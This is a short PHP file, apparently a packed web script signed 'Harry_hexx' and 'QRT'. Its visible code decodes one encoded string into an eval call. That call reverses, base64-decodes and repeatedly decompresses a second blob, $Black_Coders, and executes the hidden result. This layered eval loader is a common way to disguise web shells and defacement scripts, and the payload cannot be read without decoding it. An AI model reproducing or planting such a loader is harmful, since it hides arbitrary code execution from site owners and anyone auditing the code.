<?php

//OBFUSCATED BY: Harry_hexx
//ENCODE PHP BY: QRT
//SECURITY LEVEL: STRONG

$QRT = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNEJsYWNrX0NvZGVycyUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$Black_Coders = "=UeQLa1T6kaDAYn9KYtmaWJyG4KaPkkTen8QHFNz1EiWJjF1bjROgIWITJKDAZc+AtZZO0GI0MtCYOtYG4EILJ2AxATqK2wgEvaWpYAg0PfAJ98zTzMzN9c0J3MSO/i0s4cKqwyLV/szLF9KNn0KP7sSt4ULq0EKJzyzLdNLK9y1SbLKpkCKKDVVwKFd3lIUQhCyvE7sci3/sBwkBwJe/HGAeGw/cBwoB8/VAgaA";
eval(htmlspecialchars_decode(urldecode(base64_decode($QRT))));
exit;
?>